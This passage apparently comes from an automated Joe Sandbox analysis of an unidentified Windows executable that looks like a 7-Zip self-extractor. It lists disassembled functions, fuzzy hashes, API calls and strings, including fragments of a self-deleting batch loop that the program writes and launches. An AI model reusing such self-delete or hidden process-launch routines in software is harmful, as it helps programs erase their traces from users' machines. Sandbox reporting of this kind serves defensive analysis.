                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3dfa02b277370bfe2ec98d47c5a79ead9a97245a421863a61a189d28b752ac7c
                                              • Instruction ID: 00da42485b8df296a223d8a4bb0704d2d4beee18af5583a36affb2337f9ab949
                                              • Opcode Fuzzy Hash: 3dfa02b277370bfe2ec98d47c5a79ead9a97245a421863a61a189d28b752ac7c
                                              • Instruction Fuzzy Hash: 50D183368882628FE308CF1ADC44566B7A2BFCD350F4E8A79DD9527652C334B913CB95
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 91de5e9ca90c5c66c09e0000d0865218a8ccaff647e0888f7f8b7f535350ac81
                                              • Instruction ID: 5ec5f7016d4c94f6aa32e55c68bec760aaf54e75b98fe93e418b11edeadc38de
                                              • Opcode Fuzzy Hash: 91de5e9ca90c5c66c09e0000d0865218a8ccaff647e0888f7f8b7f535350ac81
                                              • Instruction Fuzzy Hash: 95D1A43A9082A28FE758CF19D850126B7E2AFC9350F8E457DD98427653C334F912DBD9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 692e8d5a784aa824240187812a4086a9ace9186d529d49d216be83ef82546555
                                              • Instruction ID: e08defff148b5926bcd092bf2a3d3211465a78a42eddcaea689309228d3a1ec9
                                              • Opcode Fuzzy Hash: 692e8d5a784aa824240187812a4086a9ace9186d529d49d216be83ef82546555
                                              • Instruction Fuzzy Hash: BD41F231B506250AF30C8FA99CD41962FC3E7CA3D2788C63DCA65C6299DABDC057D26C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0fe830799879132e88faa9bdf83c895a4da26f2b58621200bb7b6a207094dda4
                                              • Instruction ID: eb176d849e67670fb013f548a384bfff0e8aae9c15968500794edb79f18e410b
                                              • Opcode Fuzzy Hash: 0fe830799879132e88faa9bdf83c895a4da26f2b58621200bb7b6a207094dda4
                                              • Instruction Fuzzy Hash: 5341F131B506250AE31C8FA98CD41963BD3E7C93D2B88C63CCA65C6299DABDC057D258
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e781e73348b070714efe4b9f1f387dbcbf5b044bf6c7f23a7a0004d2e0ca769a
                                              • Instruction ID: f9960863feca845e0a2bb083c79b3a3513025fe6868613be1ab6860882a09a92
                                              • Opcode Fuzzy Hash: e781e73348b070714efe4b9f1f387dbcbf5b044bf6c7f23a7a0004d2e0ca769a
                                              • Instruction Fuzzy Hash: C841A361814B9653EB124F7CC842262B320BFAB244F00D75AFDD179963FB326944A655
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d6961a6851b0df35e6703018b4a68322b5050cf4149273f733f52e21d87ed88d
                                              • Instruction ID: 2c4e62fec3df849f69a94679f1f46bc3cd0136aa7d98a83dd15acafa6a63b64e
                                              • Opcode Fuzzy Hash: d6961a6851b0df35e6703018b4a68322b5050cf4149273f733f52e21d87ed88d
                                              • Instruction Fuzzy Hash: 6F31E8B5F042620BF3118F1F8880165FBD29FD5210B8981BAD8A89B787D23ADC5287E4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b803c9f07239feea0f262575304a291407bbcdaffd7af9557fce45a952fefe0a
                                              • Instruction ID: 23724df58c7f4124a6ae017cfa66e22fcdf8c0dadb3566f48448e1b23328b563
                                              • Opcode Fuzzy Hash: b803c9f07239feea0f262575304a291407bbcdaffd7af9557fce45a952fefe0a
                                              • Instruction Fuzzy Hash: A1211D3B360D4606EB0C8979AD377BE24C2E344306F88A53DD247C5785DEAE9895C60D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                              • Instruction ID: 7846ea4dd02955097ce76b2bf4ea308812a0db0251b0987ea2224bd12e479c0c
                                              • Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                              • Instruction Fuzzy Hash: 3221F53290062587CB02CE6EE4945A7F3A1FBD436AF134627ED8467290C628EC54C6A0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
                                              • Instruction ID: 105f30e58fdbd480065e7f59d5795cdd8ec51099ca66f560f0d6eda42b15b9fd
                                              • Opcode Fuzzy Hash: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
                                              • Instruction Fuzzy Hash: 3D21077252442587C701DF2DE4986B7B3E1FFD4329F638A3BD9928B2C0C628DC85D6A4
                                              APIs
                                              • GetCommandLineW.KERNEL32(?,00000000,?), ref: 004054AA
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040556D
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405575
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040557D
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405585
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040558D
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405595
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040559D
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004055A5
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004055AD
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004055B5
                                              • GetStartupInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004055CE
                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000001,01000004,00000000,00000044,?), ref: 004055F5
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 004055FF
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040560A
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405612
                                              • CreateJobObjectW.KERNEL32(00000000,00000000), ref: 00405627
                                              • AssignProcessToJobObject.KERNEL32(00000000,?), ref: 0040563E
                                              • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 0040564E
                                              • SetInformationJobObject.KERNEL32(?,00000007,?,00000008), ref: 0040566F
                                              • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405678
                                              • GetQueuedCompletionStatus.KERNEL32(00000000,?,?,?,000000FF,?,?,?,?,?,?,?,?,?,00000000), ref: 00405697
                                              • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004056A0
                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,00000000), ref: 004056A7
                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004056B6
                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 004056BF
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 004056CA
                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 004056D6
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004056DD
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004056E8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ??3@$CloseHandleObject$CreateProcess$CompletionErrorLastResumeThread$AssignCodeCommandExitInfoInformationLinePortQueuedSingleStartupStatusWait
                                              • String ID: " -$sfxwaitall
                                              • API String ID: 2734624574-3991362806
                                              • Opcode ID: c2e281962814c2bd4c040bf537fa2d9b9fa3379860e294df17422ee88ae54ba2
                                              • Instruction ID: 96b1f86dbfc8e56d759c45ddf3715b356338dee30da8fd38d33b0e85c5ab07db
                                              • Opcode Fuzzy Hash: c2e281962814c2bd4c040bf537fa2d9b9fa3379860e294df17422ee88ae54ba2
                                              • Instruction Fuzzy Hash: F66151B2801108BBDF11AFA2DC45DDF3B7DFF48314F004536F915A21A1EB3A99549B69
                                              APIs
                                              • _wtol.MSVCRT([@,00000000,0041E9F4), ref: 00403B78
                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000,0041EA00,00000000,0041E9F4), ref: 00403C1B
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00403C8C
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00403C94
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00403C9C
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00403CA4
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00403CAC
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00403CB4
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00403CBC
                                              • _wtol.MSVCRT(?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,?), ref: 00403D12
                                              • CoCreateInstance.OLE32(0041C454,00000000,00000001,0041C414,[@,.lnk,?,0000005C), ref: 00403DB3
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00403E4B
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00403E53
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00403E5B
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00403E63
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00403E6B
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00403E73
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00403E7B
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00403E81
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00403E89
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
                                              • String ID: .lnk$[@
                                              • API String ID: 408529070-3575931549
                                              • Opcode ID: bf0e8a7df910328bb8376132718844ce6bb33e016dc20b09a56e47b2bf9c17d8
                                              • Instruction ID: 946a9f5c9c0093345211e4afafb7f9b8cfdd3f629f77b347e180bd11e348c725
                                              • Opcode Fuzzy Hash: bf0e8a7df910328bb8376132718844ce6bb33e016dc20b09a56e47b2bf9c17d8
                                              • Instruction Fuzzy Hash: 57A16E75810108ABCF15EFA1CC969EEBB7DFF19306F50442AF402B61A1EB399E41CB58
                                              APIs
                                              • _wtol.MSVCRT(00000000), ref: 004050E7
                                              • _wtol.MSVCRT(00000000), ref: 00405103
                                              • lstrcmpiW.KERNEL32(00000000,0041B810,?,?,?,?,?,?,?,?,?,?,?,?,?,004062C4), ref: 00404FEA
                                                • Part of subcall function 0040247D: GetLastError.KERNEL32(00000000,?,?), ref: 004024CC
                                                • Part of subcall function 0040247D: wsprintfW.USER32 ref: 004024DD
                                                • Part of subcall function 0040247D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004024F2
                                                • Part of subcall function 0040247D: GetLastError.KERNEL32 ref: 004024F7
                                                • Part of subcall function 0040247D: ??2@YAPAXI@Z.MSVCRT ref: 00402512
                                                • Part of subcall function 0040247D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402525
                                                • Part of subcall function 0040247D: GetLastError.KERNEL32 ref: 0040252C
                                                • Part of subcall function 0040247D: lstrcmpiW.KERNEL32(00AB9258,?), ref: 00402541
                                                • Part of subcall function 0040247D: ??3@YAXPAX@Z.MSVCRT ref: 00402551
                                                • Part of subcall function 0040247D: SetLastError.KERNEL32(00000003), ref: 00402578
                                                • Part of subcall function 0040247D: lstrlenA.KERNEL32(0041B328), ref: 004025AC
                                                • Part of subcall function 0040247D: ??2@YAPAXI@Z.MSVCRT ref: 004025C7
                                                • Part of subcall function 0040247D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 004025F9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ErrorLast$??2@EnvironmentVariable_wtollstrcmpi$??3@InfoLocalelstrlenwsprintf
                                              • String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$PasswordText$PasswordTitle$Progress$Title$WarningTitle
                                              • API String ID: 2725485552-2157245290
                                              • Opcode ID: b07f42a23a9929bffc3acaede4da6c7cea93b6737588d89eae477c6541a7c779
                                              • Instruction ID: 66a2ce9ff7a2cb702224bd8f74ea761d5872454bbbc4643ec2785d60350ddd68
                                              • Opcode Fuzzy Hash: b07f42a23a9929bffc3acaede4da6c7cea93b6737588d89eae477c6541a7c779
                                              • Instruction Fuzzy Hash: AC51D8F1E016007ADA216B275D4ADAF366CEB85704B28443BFD04F22D6E77C4A4046EF
                                              APIs
                                              • GetDriveTypeW.KERNEL32(?,?,?), ref: 004057DA
                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0040580B
                                              • WriteFile.KERNEL32(0041EA30,?,?,00407468,00000000,del ",:Repeat,00000000), ref: 004058C0
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004058CB
                                              • CloseHandle.KERNEL32(0041EA30), ref: 004058D4
                                              • SetFileAttributesW.KERNEL32(00407468,00000000), ref: 004058EB
                                              • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 004058FD
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405906
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405912
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405918
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405946
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ??3@$File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
                                              • String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
                                              • API String ID: 3007203151-3467708659
                                              • Opcode ID: 30920ae2f114942037667fcef3695092ebf7d87c0f31e60c9b52ff49f89ef857
                                              • Instruction ID: eb7ea14b5f0693ba8c6a98bcb421c9bec9bd01f197c59b95adb21b6866ed8523
                                              • Opcode Fuzzy Hash: 30920ae2f114942037667fcef3695092ebf7d87c0f31e60c9b52ff49f89ef857
                                              • Instruction Fuzzy Hash: DE413871800108AEDB11ABA5EC86DEF7B7DEF04724F50843AF511721E1EB795E85CB98
                                              APIs
                                              • GetClassNameA.USER32(?,?,00000040), ref: 00403436
                                              • lstrcmpiA.KERNEL32(?,STATIC), ref: 00403449
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00403456
                                                • Part of subcall function 004033E0: GetWindowTextLengthW.USER32(?), ref: 004033F1
                                                • Part of subcall function 004033E0: GetWindowTextW.USER32(j4@,00000000,00000001), ref: 0040340E
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00403483
                                              • GetParent.USER32(?), ref: 00403491
                                              • LoadLibraryA.KERNEL32(riched20), ref: 004034A5
                                              • GetMenu.USER32(?), ref: 004034B8
                                              • SetThreadLocale.KERNEL32(00000419), ref: 004034C5
                                              • CreateWindowExW.USER32(00000000,RichEdit20W,0041A584,50000804,?,?,?,?,?,00000000,00000000,00000000), ref: 004034F5
                                              • DestroyWindow.USER32(?), ref: 00403506
                                              • SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 0040351B
                                              • GetSysColor.USER32(0000000F), ref: 0040351F
                                              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0040352D
                                              • SendMessageW.USER32(00000000,00000461,?,?), ref: 00403558
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040355D
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00403565
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: Window$??3@MessageSend$Text$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
                                              • String ID: RichEdit20W$STATIC$riched20${\rtf
                                              • API String ID: 3514532227-2281146334
                                              • Opcode ID: c286caa82b99ae390a7687983e8ee3eb06d76ab9f7170e9dcdb9ea0a05f1a152
                                              • Instruction ID: e5fea360a7eb9894b086cd4675cd9c6500acd79176ce5b6afcc660833785d9d0
                                              • Opcode Fuzzy Hash: c286caa82b99ae390a7687983e8ee3eb06d76ab9f7170e9dcdb9ea0a05f1a152
                                              • Instruction Fuzzy Hash: 67317F72901109BFDB01AFA5DC49EEF7BBCEB08705F10407AF604F6190DA799E518B6A
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00409240), ref: 00408E9F
                                              • LoadIconW.USER32(00000000), ref: 00408EA2
                                              • GetSystemMetrics.USER32(00000032), ref: 00408EB6
                                              • GetSystemMetrics.USER32(00000031), ref: 00408EBB
                                              • GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00409240), ref: 00408EC4
                                              • LoadImageW.USER32(00000000), ref: 00408EC7
                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 00408EE7
                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408EF0
                                              • GetDlgItem.USER32(?,000004B2), ref: 00408F0C
                                              • GetDlgItem.USER32(?,000004B2), ref: 00408F16
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00408F22
                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00408F31
                                              • GetDlgItem.USER32(?,000004B5), ref: 00408F3F
                                              • GetDlgItem.USER32(?,000004B5), ref: 00408F4D
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00408F59
                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00408F68
                                              • GetWindow.USER32(?,00000005), ref: 0040904E
                                              • GetWindow.USER32(?,00000005), ref: 0040906A
                                              • GetWindow.USER32(?,00000005), ref: 00409082
                                              • GetModuleHandleW.KERNEL32(00000000,00000065,000004B4,00000000,000004B3,00000000,000004B2,?,000004B7,?,?,?,?,?,00409240), ref: 004090E2
                                              • LoadIconW.USER32(00000000), ref: 004090E9
                                              • GetDlgItem.USER32(?,000004B1), ref: 00409108
                                              • SendMessageW.USER32(00000000), ref: 0040910B
                                                • Part of subcall function 00408270: GetDlgItem.USER32(?,?), ref: 0040827A
                                                • Part of subcall function 00408270: GetWindowTextLengthW.USER32(00000000), ref: 00408281
                                                • Part of subcall function 0040793D: GetDlgItem.USER32(?,?), ref: 0040794A
                                                • Part of subcall function 0040793D: ShowWindow.USER32(00000000,?), ref: 00407961
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: Window$Item$Long$HandleLoadMessageModuleSend$IconMetricsSystem$ImageLengthShowText
                                              • String ID:
                                              • API String ID: 3694754696-0
                                              • Opcode ID: 8832852695b61a5bc0c0008d723e966c16d3ed2a948ec000c9245d8e209d2d2c
                                              • Instruction ID: 99f397414dc97442f2ad5b2e660166812613d2f2543b201c56f9d92a48738ce2
                                              • Opcode Fuzzy Hash: 8832852695b61a5bc0c0008d723e966c16d3ed2a948ec000c9245d8e209d2d2c
                                              • Instruction Fuzzy Hash: B971E6703047056BEA216B21DD4AF2B3659EF84714F10443EF652BA2E3CFBDAC018A5E
                                              APIs
                                              • GetWindowDC.USER32(00000000), ref: 004021B4
                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 004021C0
                                              • MulDiv.KERNEL32(00000000,00000064,00000060), ref: 004021D9
                                              • GetObjectW.GDI32(?,00000018,?), ref: 00402208
                                              • MulDiv.KERNEL32(?,00000003,00000002), ref: 00402213
